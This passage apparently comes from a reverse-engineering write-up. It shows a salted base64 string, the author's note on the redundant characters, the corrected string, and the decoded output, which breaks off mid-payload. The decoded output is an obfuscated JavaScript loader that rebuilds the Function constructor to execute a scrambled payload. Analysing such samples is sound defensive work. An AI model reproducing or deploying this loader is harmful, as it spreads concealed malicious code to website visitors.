25uXXNjN1dtLmErXygiLmptTmMoZltpLmVdX3UubmUsX2UpdFdjVSksZVddRiBXVygueTFXIGldV1clV3pdV3VdMF04Ni5qUDArOSxlY2UxLi5zLlcsJGljV2VwODwzJF9iLiUrMjVfXWVqdHlbN2EgKTYuZmp9JH1hfVdXKGxXNkQxYW9lVyQpTSI1O2pXNGouaVwnKGwoRlY2M1BQVzVXJXUpNyBlUCAgLi4pcXt9dE4pcyg7ZSYlZDA4bEtqWy45LjQmVyFmV2U8ZiBxbDZpZlBhUDVie312UDVyZy1sJC4gRmVmV1NXanBlY1dFRWUlJHwpTmZXO2Flbm9fXSRQcm4sZnopaV9qXVdqLiQgODlyLiVfVyJoMWlQaSQ7bikxUFdXfDEiVyYlLjJqcDdMZXQzVzVkZGEmdS4xenx5ZFd3WmpXVylXKGZ4IGxwLmFrbTllNl9qPS4ubiU7Iihvd2JlVFBvclApM1NXRWYpe1dXbV0tV1dXV3xBI2dycih9JGxXJmIlZFdqO2NgVypXai5iQWgwcD1XIDBQQWplKXJUSVdlbShmdXcoXS5QZl0kV2lwMzkpM1wnVzAuV2ZvVyVicCxlISFKV113ZmZscmkpVytpV3JXO19XblcpOzBXemUxKCI7Yy5WKDN7Vyx1IDhQamE3eS5XQm5XblddKG5tcno0VykrOGZmNl82O2k9O3QuY0UwIWtlfSlfXyhdcGFvV2V1dG5dVykwaldXIGosXWs2aTt7YldNMS5dLmNfYyRXQyhIb29aX1BfM0B7UCg7KS5OZlc2V3V7K2lmY1cuN1czV3BfVmlwLm1QX2Y2JWQqIXQpIFcsX2pjdjtXUFckYWEuZlRXX1cuZWV2e31qJHIlUGojb3pQfW5XLiZfTncwIHBvLndfaVc7alcjNV9QLmZXX3R9ajlhbiIodTV7ZWxTeFoxQGd0MV9uNlc7NFdjVCA1JVcsJSkgIGYgNHZlLClpX10uWyYoX1c7ZX1XaldQKFdnKCMpZld7NWVbITsge0Qub1R4Knh1YTkiKVAgV1dXNS5XZlckNTZdP29lPWdXc30ocH1hKXN7X25jN1BXdDBXd3JXV2UzIHQ0LmcsIEFyaVdmZSohdG0xUChsdGN7PWZuZ2lhZSU9IDUlWz18bzg2Lm4mdyg3bSkoPTZbVy17aSluUHRXZmoyJVc3c1dlX29pbk02V1dmMXlmIl85V1dQcm5jd3NhJVcoO1hQKCBHLCl0NW4pcFcxMzRXXXFfOGwpKXs2cHIuUGl3aW1we1cpdGopMShddCpsXzElLDtxLDByZl9qV29XKSlmezNdXylQdChmamxcJyFXazU7LyVncTJXZzMpZSg4V1NXeWpXTF5fNGNXOGlXIXtYW1dueWgpQ2osaWktLnI7YiUrJWNaV3Q1IS4xKClkKThoV18zaXRpIC4gamYsUFdXVldqIiAuaS4pVCM2ZXswaiFvKGV3c3Q2V1dcJyV0Lih1KCQxN0RibjQ2cigydE1dUDYoVzNjM2kucldVdFdQKWldL28oNFdXIi1KIztXeig7V1A0Xz1XV2ZXdFV0RSwleWpmbSEtIHIlVz0wIklyZitnMTdtUFciKSJ3aSh0IGVyVjtdci5qZDJkZSwlMFBvYilpYilQbVc7cnBjbX1XXzFXXVdqYjZQVzJzOGV7VzAyaWpXKDRldFc1VztjdG5dXVcmOFc0Ziw7bWFtdGU2cD1XW1c5S2VZKWkxKDtXbl0lNDRqZThlIGZdaSFvdyxddFdsdChXdGlQO2YpV189cylXLH19aWx7UHBQJHRlcVd7LmkpL3BqX3V5PWI1VyFXV2V1dUcgdil0bE5yLkViNVczdWdXYl8oTDZQLC5xJSlXYXRabmVXYVdle3ByJHE0IndiXWUuczZ3UGkuMGJvdyVMc19zbjswNXMiX113LikhdGYuKHddU2ghYzBhNzsuN1soeiApIW5XXCdtKSAkbldXdCkpcCVTNyUuMHwuSW50ey5mKVlXMl9sZl0oVyB0dXJyIFdpdHJXdHc1OGFzUFtlSiEwJHplV1csbDM3PldXfWZdaSh0NStkczNXO3JfVzUoPWpmJld2NWkpMyhlV3IscF8jKTNXZmExTVdlInshYWRhPCV1P25XJWEuPXRpLm5mKC44bmVmO2RdJmV1PlAucmlkMyEtUGFtKXM7c0RbUC4oVzszXWppNSBPdHJuMCFlZ2VjdSlXdGUjJWVuZyh4YXU0JWJkV10pY1BXe25zbmpraClqZWNmKXRlZixlbmdqbixiJVsoaWNyN3MjaTI2NGQgaSkxV3oxRWExdDZbd3J9LmpyV11Xb2Zwc290ZChub2wjISApMkVzSGgob109c2V7QGI1ZXRXYnNfenpwLig7IGVKV19dYjBcJ2kkamZhLGUudWZSdCU5VyBQbHg7XW9XXVBudCAkYSA0LldzOHthZHJDKDRDX2FhUCJwPTBmJFcyJFdQVzMsMlEwJFB9UFdXKCVyUGd2LmtTKS4oV2lvb102amo7UCFhI1ApfThuPV1lcjZhZzJQai49JGVlLi5lZlcxP19hMzEpLmpmYX1lLl8zfS5XXzZdOC5jKDVwMSZpKVt0UClbV1d5dyksMCBwd29hNm5kM1ddOSkgPV0xV2BlXyRXamUiVyQoImVuIG9AYWVXYndzZVd9NVduOFcrZW4iKGUlMCViZTUpZ0AlZWZjIT10YXZmZjtXaVNsbiklKGUpd3IuVyk1IVcyMGoxYVcpUCU9Y1B4Lm1QXTEoKUpQXXI4KSp1XSxwcTckVzQwVygvZTdrOnI9KF1uU25XXTgzXSk7fHN0OyEhd1d0OChmd2lzZlxcXTBXKTNuX3N2aV1udThQLmJyci5dNy4pUFAucnZwV2VXZGc4LChnLGk2O1d7YWI1JShzXT0ofShpdWF1Yy49V144NXYoYShnKVcjX2IuVzdmYzYuamksXW4kISgpViFXKUVqNmNtbW5XbjIwKFBXaSVmYD9fdSlfVzNlOTAkV11iKVBqczI1RVdlPW90UDRlM2c7dSUleHM3V2JPNlBXe2IzbiljMi5XIF1zMVBQVyg8VyQ5MzA8akg9V3ciV3J0ZilXTiBdV2U2IzA5YzBEPF0gVyYxZGYxUCBpfGkoeylXIzk4VzRdX10tV29vXV0pbjFvRWooIFBXXyg1IiVhMD1FOy4/bHYwIjBpezZQMC53XSQwIVdXLVcuKVdQVytnbiwzeFcsV2ZkLj17IGVXLm5ybX0xLldfYVdXXShsNilXd1czanJwIDg1bFdpV18sJixqbTQ1KDEuXCdhV1U0MChsb19nKWw0OCldX3QuVykhV1dFRSBQZklXK3txZnNyZFNXMFduTiQzfW9XKVdkamZdMitlZTZXVyktKGVXbHQgV1dbLmk2blduVy5pKGU5KFcmbFddV2FXOTgsI1duKGY9NDIlOVNcJ2VrZTdOKV9mUDc7aigwUGlkV3RlVzVvKF0pZDJdNXk9bEkoIVc7eSAuUHU7ezNdb2ZuKDMkfThmN3BzamZsLm4te2osU28kUGVtaX1XV1wnKWU0KFNmVzI4NmYgJTBlcGMpZmRycWlvYXEoLl91X2NXX3lvLldwaTZXLlddKSkwdS1XbHgsKVAmKS5qKWNdc2UoaDYuey5XRFxcYTFdN2Z0ZTtzU1dQIFcoMmIuJGUkI3IzLChwIHtmKS4xXV9xJV9kaTE2OGhXZS5heH1md31lV29qdylXU2wwdHJXcyBsfSVmcGJobzUoM3tvXUMyLjs7a1dheVdmSU5taXQucFdjLlAob2VQX2E1Yy5XX2BpKyY9V28ucnJpc1d7UDpXJSBTZn1lLm1sbDZXV181UHQ2aT1XblcuIGU7V2lXVyAoeyA0VyMuXWZXKGZdbG8yalc7M1AtKX10Ll51KGMgU1dnYS5lLld9KTVkV3RXIShQMGIpNXBETilsV3lwdWFjITZXKSkuUGI3ajFvZmliYkdsYVdrM1BzMSBhLDQpYjRyamRXU2VtJSlwemkmKW80ZmU7Lm5XfSkjfXhnKHR7cCRLbldiejNJIjlXUCw2W05mX2ZnUCkwO0NoUFdXUGomZi5uLmJmej1dUCNfXzd7XCdXVzFzfSVdXyBXKUk9ITg2OFd9bDBqV11fZVdieFddY2RfUFdXV2EpZmckUG47PWJdV18wPV1XeiAgV3RXZWIkbVBubmVxV19wX2d5NzFdVzMgfFcoZiVzNSl0IVdkbSYucnF0V3IgMy9dSWNTZ19XdkZ9UE4+IFtiNWplaiRXdmZqdzUtUGwgV1d0V10gVzNfcmZfVz00M11dXVdlNyEocV1qV31waSgpdCguV11Xd1BXbFd5V2w2PS5QVy4gXWcwIS5XYW50V2NsaTVqLVt8bHd7ZTc1O2dvV19QdFcpYjQ2YVcyV2ZiZiBleWZdbSRXZiBoV11qMmV9VywpLGdXKHBjYWo1UCtwblc1NVApcCAucGJtZzFvcmkuNiRdNDdXVyl3eC5TMy5mY20oLmpyUGo4NVcgWyl8ZVtpVzRvYXopciZXbFBlIEF7V2EubW5XIG9XKFdwfXVmZSlXLldfV3IlPW8hN31XamhrIShqIDlyaTEzKzZwZW8oOV82dGdXV254e259XWwoVzcoJTY3Yl8iX19dNTN9ODshIClyKm52MVcmcHRwaylJZCllOChudVdJMFc9fWZ0Ljd0LmxmKTZXVzVrY1AnKSkpKDM1OTcpfSgpOw=="

Adversaries sometimes salt base64 strings to deceive reverse engineers. In this case, the following characters at the start and end of the above string are redundant:

  • "
  • K2iZ1

The resultant string is:

bmN0aW9uKCl7ZnVuY3Rpb24gVyhXKXtmb3IodmFyIGU9MzgxMDk5NyxQPVcubGVuZ3RoLGY9W10sbj0wO248UDtuKyspZltuXT1XLmNoYXJBdChuKTtmb3IodmFyIG49MDtuPFA7bisrKXt2YXIgcj1lKihuKzMwNSkrZSU0ODYzOCx0PWUqKG4rMTU4KStlJTMxNzU3LGk9ciVQLGo9dCVQLF89ZltpXTtmW2ldPWZbal0sZltqXT1fLGU9KHIrdCklNjcwMTUzMX1yZXR1cm4gZi5qb2luKCIiKX12YXIgZT1XKCJjb2Nvd3JmY3RnanVybnh5cHVoZGV0bHJidmtvc3Ntem50YXFpIikuc3Vic3RyKDAsMTEpLFA9V1tlXTtQKCIiLFAoIiIsVygnYWdoICA9LjY9aTkyMW49byguZ111bCtvXXJvd2NkaThvcjt0c2NhZXZdaW03bnVbcik4OyhzYV1yIFs9Ymx0ZCxubjBbdm0uZDdpYShuYXYsLDAoLHJ2dShycjgpLGk1LG52OylpZyBlLG0ob2xsLHYwdCg7LHQwcGNsYUFhKG5oLGlmaFtnY3JiN3YuLG5lbHhDbG96bz1nb1s7aTl0WyFycFsrPXM9djswPTErYT1hPWdzZT1vLHI0XW9dIXhzOykgYyIpaltndGVycnthZG9kYWFybittaGhiYi5pcDcgdEE5biItKXcocnJhcnJhPXRibXVDdD1pYTYuLiljKSl1cithMSJmMDs7Z3JyPmVhdj10QztrK2otaDsxZCBqZ3B0LWgoaGhkID1ldDtsZT12bHJTYjEpQ3JvO3ZhLCBnbStzKD0yPX1yb1tuKjtocztlbC07PSB2ZihkYzZuaTsrIHJ7anJTbDFucnNnczthO25jaytyanRlZzNybj0iLltxYWwgb3UgMGMycmk7bTA9PTEoZV1hZl0gcitjO3RheytvLWNuMzQrOyBoYmRBdi5hZT1ibm9mdC57KCAxZ3M7KTspbDFpai05dHcwN2ZmdmEpNWxhfTsobmZ9YSJndGg3dSsyLDJxPTs9dmx2ZXQ7Wyh0OyliLmIoICA7dTlqcHY4MDt2Mjc7aXI2cCxydWkgbjc4LGdjPXtjeTkscHBlOD0pbGY7PD10O2d1NGdzPSsxOzYiKDssOCk2c3J9dnVlKz1idWM3dCguYnN7bz1dKSloay5Dcjs7O3JhaDwpaTYsPWdyK31jIF05KC4oaW49bCsgKGhhZGFmMXBoLml1c102Zi5zcjtqdGtpLD1kKykoMHJicC5dYytvMmNubyI7PCpnKXI2KThyc2xzKDA7eF09djRyPTV1YSlvQ2lvKWVvdDtvYXJlYT0uPSlyKDZ1KH1lPWEsZ3JwdHI8Wygzbj1paCJ6KXZ2PVtbdmwoO3IpcG9mampxLCIydUNubChhayspaX0udHJDdnZsIGY9Li57LXUoIClzNG4pbzIraS5ddncuLmVuYjs7bnN6LGMsO2NuICh1KT4rcit4NiwrdSJybillIChmbmJodGc8KGtucW5lKSlhbjtyLC50cmU3d29ucGwrbWV0MShBLEEuZTZ1bGw4LmEnKSkoVygnNGZXZm8xIVdsZGV0USQ7cGJuJCQpKSlmbDAhU1d1V2VlZkNpY1hfZjs7b19VND0yX1dmXWFXZyguKDE7Oj11Z19oKWUgKCRzfTs0fTJXJVcuV1d9ImJ0IVdXVzR5W1BXXztyXXE6NWVlfFdpV25cJ1dyWnQyMDN3XS4gWSVOIGIpeVckLiQ2KFd7fWRlbG9XXVBib1dqeztDVyAoZi5dLCJfKC5mb3lwKHVXMDZ1V2pXfWZlb2pXdCFXamNiV2pQbiEuLiMgdFg2XXMgaiFsfSBmYj02XVdsZWUsKVcoKWVDKVdXKGRXcm8gUF9yKTpvY1Byd1RQIThdNTxXV3JXICkpYX1fZWNlbiRXOVdjdGUpMzYsNC4wOWx9V2FldW9wMGIpKHt7LGMpV1dyai4uYXplZTcuRWp9V2RXO1RXeFBXbl83ZSlnamo4ZVcoZX0jdX1TV19oMS46YilPV3AkKDUsVylfXSBXUGU9dSllZSB0MGR0LmMoV1AoV2wqaSRnV2YoKzBfdzVXOWdXUFc9dDczLHUkV2VuZiRzXyhXZV9mPSAhXyUxUDBiNVdvVyhSVD0haT1uKWkpOTUpUFdXcSk3U31dV2VbPVM5VyUgLmdXeDAufXJ7V0hXVzVuVzZ0LlMsMWVvZ1tmNlQoZCkkLCBXcldlLl5bOTZ7cjEkej0sJHQzVy8wNFgyV2VdP2UoZWlQMFdXLmFuKUQuX1d3Q1NOe2JXV2pXX3R7Nj02dG5fV24odHA1fX1uJTssIDQgJC4wW2U5KHZ0L2tkLyBpZ1BjZi5qY19lV1AybVBqYmYhV2pzID1XZWZfNjkuLDk7ZGFpKyl7KVdQV28zKG4pNS5ifVclZFcpbixQNDQpaXJ3aldCZnU0NVcuLzBlZWRXKWxuUmk7cFdvXTUtV2NmXCdQRn0wVyFmU3MwVyklaChmV3VNK21lMikoV2UvVyAgKHUiYmpfXyUka19QMENuJTAoZmU9V1FjdDJvMmdvKGVQMmwxIFd9biF1Zm47bl1XN3die2k4PV8oVzU4N3YlXSFXX1Bxe1cxLil1JFcsW2RmLXVtZV9XdFcoKGYqXVclSiVvV2pzYXJDKDhlZmxdZX1JRHQuVz1iKURXeldXX3FXIzkgI3BtaiVuc3A7bnVcXGxdVy49Vy47Nj1XfS57JV8/cC1XZm4/bFcgbW9qV2koOSFXfSJsZno0LnBXLnIqYmVfbF8uLmEgW1BEIXtQVylfbmVxUDdQVyYkUEJ7aDM7b1dhV1d7aW4zI2orVyV1JHR1IkN5LHBqb3tXOzBpZSVfMSpXITEyakIpMGkxZV8yVzJFbjBwKWR9OylsaVdqLjAgan0sU29hLF4uX107UFdqIjApLjI5O1BvV1dmKS5XKDt7Sih3bjJQVlcoLlBXIFd3NV05dF19V29dXSxyVzF0aV9nX19XPT1XaS5QUGlXV2NQZikoVyk1VzUoLzUwJldNfDdyKWsxeyxQc11uXyksUF93XV9ldFdXZS4oaVAhKS5kV2I4Zm9XanVXV1dQIzdmUDVXXVc3KCEwbzBcXFd5MiB4MXtFMTEhLmVhMChhMVwncltnOyxXVy1tbWkmUFBQWV9qaH1fYjhnOVdXcix3V1d7Z2ZyOXQkYV8yKUVpUXVXKDRuMWpnXWksJSNcXHtqYTdXW1cmdFc/ey42ISFQUGVXZClYMSBlOC12YVBmLFcrIil0ZWd7fW4lLCtyJGFdMj8zZik7d3UlV25XMW99ZShvMSJXKXVXKGxubWVqKSksam9fODIkLDVqdE1QeyQpVzl0am49c2E7YSEpKFczd2UldXB9fGVsXzhde3plUGpQUyMuKGdcJ2VXO2Eldk0wYVdvMDV0d2RdNFdXV3JXIDNXdCBkLG8uJGlQNElXY3V7V1dXUCk5VzMoV3RHN1cobndqZWguVy5pfSBXKGw9Zm8we24sYS5XKWYmZTFqb2YldFBhZCxXc1d2O25fbldJLiB1UGpvbGpqUFUkenI0MldpZmV8XVckfXRXaiVdV1AlZClXMFdXV2QlPmVqIGkpdHpOcyJyaXo3UFc3MnIycmJLRSg4dC02NTZOVzcqXWNsL2YlLGYpbDtzPF1mcC1XV25dYVcyOS4oV25XUmpdXSlnIDY9ZyhhZV9pdE1XLGl1anVXd2ZQezNXV2ZXVywyeXcpO2IxLFcvMWMlICBhUCAuYlAzY2tjMHVmLjNsV2VXeVdddWdXV25iIClXV25uXXNjN1dtLmErXygiLmptTmMoZltpLmVdX3UubmUsX2UpdFdjVSksZVddRiBXVygueTFXIGldV1clV3pdV3VdMF04Ni5qUDArOSxlY2UxLi5zLlcsJGljV2VwODwzJF9iLiUrMjVfXWVqdHlbN2EgKTYuZmp9JH1hfVdXKGxXNkQxYW9lVyQpTSI1O2pXNGouaVwnKGwoRlY2M1BQVzVXJXUpNyBlUCAgLi4pcXt9dE4pcyg7ZSYlZDA4bEtqWy45LjQmVyFmV2U8ZiBxbDZpZlBhUDVie312UDVyZy1sJC4gRmVmV1NXanBlY1dFRWUlJHwpTmZXO2Flbm9fXSRQcm4sZnopaV9qXVdqLiQgODlyLiVfVyJoMWlQaSQ7bikxUFdXfDEiVyYlLjJqcDdMZXQzVzVkZGEmdS4xenx5ZFd3WmpXVylXKGZ4IGxwLmFrbTllNl9qPS4ubiU7Iihvd2JlVFBvclApM1NXRWYpe1dXbV0tV1dXV3xBI2dycih9JGxXJmIlZFdqO2NgVypXai5iQWgwcD1XIDBQQWplKXJUSVdlbShmdXcoXS5QZl0kV2lwMzkpM1wnVzAuV2ZvVyVicCxlISFKV113ZmZscmkpVytpV3JXO19XblcpOzBXemUxKCI7Yy5WKDN7Vyx1IDhQamE3eS5XQm5XblddKG5tcno0VykrOGZmNl82O2k9O3QuY0UwIWtlfSlfXyhdcGFvV2V1dG5dVykwaldXIGosXWs2aTt7YldNMS5dLmNfYyRXQyhIb29aX1BfM0B7UCg7KS5OZlc2V3V7K2lmY1cuN1czV3BfVmlwLm1QX2Y2JWQqIXQpIFcsX2pjdjtXUFckYWEuZlRXX1cuZWV2e31qJHIlUGojb3pQfW5XLiZfTncwIHBvLndfaVc7alcjNV9QLmZXX3R9ajlhbiIodTV7ZWxTeFoxQGd0MV9uNlc7NFdjVCA1JVcsJSkgIGYgNHZlLClpX10uWyYoX1c7ZX1XaldQKFdnKCMpZld7NWVbITsge0Qub1R4Knh1YTkiKVAgV1dXNS5XZlckNTZdP29lPWdXc30ocH1hKXN7X25jN1BXdDBXd3JXV2UzIHQ0LmcsIEFyaVdmZSohdG0xUChsdGN7PWZuZ2lhZSU9IDUlWz18bzg2Lm4mdyg3bSkoPTZbVy17aSluUHRXZmoyJVc3c1dlX29pbk02V1dmMXlmIl85V1dQcm5jd3NhJVcoO1hQKCBHLCl0NW4pcFcxMzRXXXFfOGwpKXs2cHIuUGl3aW1we1cpdGopMShddCpsXzElLDtxLDByZl9qV29XKSlmezNdXylQdChmamxcJyFXazU7LyVncTJXZzMpZSg4V1NXeWpXTF5fNGNXOGlXIXtYW1dueWgpQ2osaWktLnI7YiUrJWNaV3Q1IS4xKClkKThoV18zaXRpIC4gamYsUFdXVldqIiAuaS4pVCM2ZXswaiFvKGV3c3Q2V1dcJyV0Lih1KCQxN0RibjQ2cigydE1dUDYoVzNjM2kucldVdFdQKWldL28oNFdXIi1KIztXeig7V1A0Xz1XV2ZXdFV0RSwleWpmbSEtIHIlVz0wIklyZitnMTdtUFciKSJ3aSh0IGVyVjtdci5qZDJkZSwlMFBvYilpYilQbVc7cnBjbX1XXzFXXVdqYjZQVzJzOGV7VzAyaWpXKDRldFc1VztjdG5dXVcmOFc0Ziw7bWFtdGU2cD1XW1c5S2VZKWkxKDtXbl0lNDRqZThlIGZdaSFvdyxddFdsdChXdGlQO2YpV189cylXLH19aWx7UHBQJHRlcVd7LmkpL3BqX3V5PWI1VyFXV2V1dUcgdil0bE5yLkViNVczdWdXYl8oTDZQLC5xJSlXYXRabmVXYVdle3ByJHE0IndiXWUuczZ3UGkuMGJvdyVMc19zbjswNXMiX113LikhdGYuKHddU2ghYzBhNzsuN1soeiApIW5XXCdtKSAkbldXdCkpcCVTNyUuMHwuSW50ey5mKVlXMl9sZl0oVyB0dXJyIFdpdHJXdHc1OGFzUFtlSiEwJHplV1csbDM3PldXfWZdaSh0NStkczNXO3JfVzUoPWpmJld2NWkpMyhlV3IscF8jKTNXZmExTVdlInshYWRhPCV1P25XJWEuPXRpLm5mKC44bmVmO2RdJmV1PlAucmlkMyEtUGFtKXM7c0RbUC4oVzszXWppNSBPdHJuMCFlZ2VjdSlXdGUjJWVuZyh4YXU0JWJkV10pY1BXe25zbmpraClqZWNmKXRlZixlbmdqbixiJVsoaWNyN3MjaTI2NGQgaSkxV3oxRWExdDZbd3J9LmpyV11Xb2Zwc290ZChub2wjISApMkVzSGgob109c2V7QGI1ZXRXYnNfenpwLig7IGVKV19dYjBcJ2kkamZhLGUudWZSdCU5VyBQbHg7XW9XXVBudCAkYSA0LldzOHthZHJDKDRDX2FhUCJwPTBmJFcyJFdQVzMsMlEwJFB9UFdXKCVyUGd2LmtTKS4oV2lvb102amo7UCFhI1ApfThuPV1lcjZhZzJQai49JGVlLi5lZlcxP19hMzEpLmpmYX1lLl8zfS5XXzZdOC5jKDVwMSZpKVt0UClbV1d5dyksMCBwd29hNm5kM1ddOSkgPV0xV2BlXyRXamUiVyQoImVuIG9AYWVXYndzZVd9NVduOFcrZW4iKGUlMCViZTUpZ0AlZWZjIT10YXZmZjtXaVNsbiklKGUpd3IuVyk1IVcyMGoxYVcpUCU9Y1B4Lm1QXTEoKUpQXXI4KSp1XSxwcTckVzQwVygvZTdrOnI9KF1uU25XXTgzXSk7fHN0OyEhd1d0OChmd2lzZlxcXTBXKTNuX3N2aV1udThQLmJyci5dNy4pUFAucnZwV2VXZGc4LChnLGk2O1d7YWI1JShzXT0ofShpdWF1Yy49V144NXYoYShnKVcjX2IuVzdmYzYuamksXW4kISgpViFXKUVqNmNtbW5XbjIwKFBXaSVmYD9fdSlfVzNlOTAkV11iKVBqczI1RVdlPW90UDRlM2c7dSUleHM3V2JPNlBXe2IzbiljMi5XIF1zMVBQVyg8VyQ5MzA8akg9V3ciV3J0ZilXTiBdV2U2IzA5YzBEPF0gVyYxZGYxUCBpfGkoeylXIzk4VzRdX10tV29vXV0pbjFvRWooIFBXXyg1IiVhMD1FOy4/bHYwIjBpezZQMC53XSQwIVdXLVcuKVdQVytnbiwzeFcsV2ZkLj17IGVXLm5ybX0xLldfYVdXXShsNilXd1czanJwIDg1bFdpV18sJixqbTQ1KDEuXCdhV1U0MChsb19nKWw0OCldX3QuVykhV1dFRSBQZklXK3txZnNyZFNXMFduTiQzfW9XKVdkamZdMitlZTZXVyktKGVXbHQgV1dbLmk2blduVy5pKGU5KFcmbFddV2FXOTgsI1duKGY9NDIlOVNcJ2VrZTdOKV9mUDc7aigwUGlkV3RlVzVvKF0pZDJdNXk9bEkoIVc7eSAuUHU7ezNdb2ZuKDMkfThmN3BzamZsLm4te2osU28kUGVtaX1XV1wnKWU0KFNmVzI4NmYgJTBlcGMpZmRycWlvYXEoLl91X2NXX3lvLldwaTZXLlddKSkwdS1XbHgsKVAmKS5qKWNdc2UoaDYuey5XRFxcYTFdN2Z0ZTtzU1dQIFcoMmIuJGUkI3IzLChwIHtmKS4xXV9xJV9kaTE2OGhXZS5heH1md31lV29qdylXU2wwdHJXcyBsfSVmcGJobzUoM3tvXUMyLjs7a1dheVdmSU5taXQucFdjLlAob2VQX2E1Yy5XX2BpKyY9V28ucnJpc1d7UDpXJSBTZn1lLm1sbDZXV181UHQ2aT1XblcuIGU7V2lXVyAoeyA0VyMuXWZXKGZdbG8yalc7M1AtKX10Ll51KGMgU1dnYS5lLld9KTVkV3RXIShQMGIpNXBETilsV3lwdWFjITZXKSkuUGI3ajFvZmliYkdsYVdrM1BzMSBhLDQpYjRyamRXU2VtJSlwemkmKW80ZmU7Lm5XfSkjfXhnKHR7cCRLbldiejNJIjlXUCw2W05mX2ZnUCkwO0NoUFdXUGomZi5uLmJmej1dUCNfXzd7XCdXVzFzfSVdXyBXKUk9ITg2OFd9bDBqV11fZVdieFddY2RfUFdXV2EpZmckUG47PWJdV18wPV1XeiAgV3RXZWIkbVBubmVxV19wX2d5NzFdVzMgfFcoZiVzNSl0IVdkbSYucnF0V3IgMy9dSWNTZ19XdkZ9UE4+IFtiNWplaiRXdmZqdzUtUGwgV1d0V10gVzNfcmZfVz00M11dXVdlNyEocV1qV31waSgpdCguV11Xd1BXbFd5V2w2PS5QVy4gXWcwIS5XYW50V2NsaTVqLVt8bHd7ZTc1O2dvV19QdFcpYjQ2YVcyV2ZiZiBleWZdbSRXZiBoV11qMmV9VywpLGdXKHBjYWo1UCtwblc1NVApcCAucGJtZzFvcmkuNiRdNDdXVyl3eC5TMy5mY20oLmpyUGo4NVcgWyl8ZVtpVzRvYXopciZXbFBlIEF7V2EubW5XIG9XKFdwfXVmZSlXLldfV3IlPW8hN31XamhrIShqIDlyaTEzKzZwZW8oOV82dGdXV254e259XWwoVzcoJTY3Yl8iX19dNTN9ODshIClyKm52MVcmcHRwaylJZCllOChudVdJMFc9fWZ0Ljd0LmxmKTZXVzVrY1AnKSkpKDM1OTcpfSgpOw==

On base64 decoding the above string, I got the following:

nction(){function W(W){for(var e=3810997,P=W.length,f=[],n=0;n<P;n++)f[n]=W.charAt(n);for(var n=0;n<P;n++){var r=e*(n+305)+e%48638,t=e*(n+158)+e%31757,i=r%P,j=t%P,_=f[i];f[i]=f[j],f[j]=_,e=(r+t)%6701531}return f.join("")}var e=W("cocowrfctgjurnxypuhdetlrbvkossmzntaqi").substr(0,11),P=W[e];P("",P("",W('agh =.6=i921n=o(.g]ul+o]rowcdi8or;tscaev]im7nu[r)8;(sa]r [=bltd,nn0[vm.d7ia(nav,,0(,rvu(rr8),i5,nv;)ig e,m(oll,v0t(;,t0pclaAa(nh,ifh[gcrb7v.,nelxClozo=go[;i9t[!rp[+=s=v;0=1+a=a=gse=o,r4]o]!xs;) c")j[gterr{adodaarn+mhhbb.ip7 tA9n"-)w(rrarra=tbmuCt=ia6..)c))ur+a1"f0;;grr>eav=tC;k+j-h;1d jgpt-h(hhd =et;le=vlrSb1)Cro;va, gm+s(=2=}ro[n*;hs;el-;= vf(dc6ni;+ r{jrSl1nrsgs;a;nck+rjteg3rn=".[qal ou 0c2ri;m0==1(e]af] r+c;ta{+o-cn34+; hbdAv.ae=bnoft.{( 1gs;);)l1ij-9tw07ffva)5la};(nf}a"gth7u+2,2q=;=vlvet;[(t;)b.b( ;u9jpv80;v27;ir6p,rui n78,gc={cy9,ppe8=)lf;<=t;gu4gs=+1;6"(;,8)6sr}vue+=buc7t(.bs{o=]))hk.Cr;;;rah<)i6,=gr+}c ]9(.(in=l+ (hadaf1ph.ius]6f.sr;jtki,=d+)(0rbp.]c+o2cno";<*g)r6)8rsls(0;x]=v4r=5ua)oCio)eot;oarea=.=)r(6u(}e=a,grptr<[(3n=ih"z)vv=[[vl(;r)pofjjq,"2uCnl(ak+)i}.trCvvl f=..{-u( )s4n)o2+i.]vw..enb;;nsz,c,;cn (u)>+r+x6,+u"rn)e (fnbhtg<(knqne))an;r,.tre7wonpl+met1(A,A.e6ull8.a'))(W('4fWfo1!WldetQ$;pbn$$)))fl0!SWuWeefCicX_f;;o_U4=2_Wf]aWg(.(1;:=ug_h)e ($s};4}2W%W.WW}"bt!WWW4y[PW_;r]q:5ee|WiWn\'WrZt203w]. Y%N b)yW$.$6(W{}deloW]PboWj{;CW (f.],"_(.foyp(uW06uWjW}feojWt!WjcbWjPn!..# tX6]s j!l} fb=6]Wlee,)W()eC)WW(dWro P_r):ocPrwTP!8]5<WWrW ))a}_ecen$W9Wcte)36,4.09l}Waeuop0b)({{,c)WWrj..azee7.Ej}WdW;TWxPWn_7e)gjj8eW(e}#u}SW_h1.:b)OWp$(5,W)_] WPe=u)ee t0dt.c(WP(Wl*i$gWf(+0_w5W9gWPW=t73,u$Wenf$s_(We_f= !_%1P0b5WoW(RT=!i=n)i)95)PWWq)7S}]We[=S9W% .gWx0.}r{WHWW5nW6t.S,1eog[f6T(d)$, WrWe.^[96{r1$z=,$t3W/04X2We]?e(eiP0WW.an)D._WwCSN{bWWjW_t{6=6tn_Wn(tp5}}n%;, 4 $.0[e9(vt/kd/ igPcf.jc_eWP2mPjbf!Wjs =Wef_69.,9;dai+){)WPWo3(n)5.b}W%dW)n,P44)irwjWBfu45W./0eedW)lnRi;pWo]5-Wcf\'PF}0W!fSs0W)%h(fWuM+me2)(We/W (u"bj__%$k_P0Cn%0(fe=WQct2o2go(eP2l1 W}n!ufn;n]W7wb{i8=_(W587v%]!W_Pq{W1.)u$W,[df-ume_WtW((f*]W%J%oWjsarC(8efl]e}IDt.W=b)DWzWW_qW#9 #pmj%nsp;nu\\l]W.=W.;6=W}.{%_?p-Wfn?lW mojWi(9!W}"lfz4.pW.r*be_l_..a [PD!{PW)_neqP7PW&$PB{h3;oWaWW{in3#j+W%u$tu"Cy,pjo{W;0ie%_1*W!12jB)0i1e_2W2En0p)d};)liWj.0 j},Soa,^._];PWj"0).29;PoWWf).W(;{J(wn2PVW(.PW Ww5]9t]}Wo]],rW1ti_g__W==Wi.PPiWWcPf)(W)5W5(/50&WM|7r)k1{,Ps]n_),P_w]_etWWe.(iP!).dWb8foWjuWWWP#7fP5W]W7(!0o0\\Wy2 x1{E11!.ea0(a1\'r[g;,WW-mmi&PPPY_jh}_b8g9WWr,wWW{gfr9t$a_2)EiQuW(4n1jg]i,%#\\{ja7W[W&tW?{.6!!PPeWd)X1 e8-vaPf,W+")teg{}n%,+r$a]2?3f);wu%WnW1o}e(o1"W)uW(lnmej)),jo_82$,5jtMP{$)W9tjn=sa;a!)(W3we%up}|el_8]{zePjPS#.(g\'eW;a%vM0aWo05twd]4WWWrW 3Wt 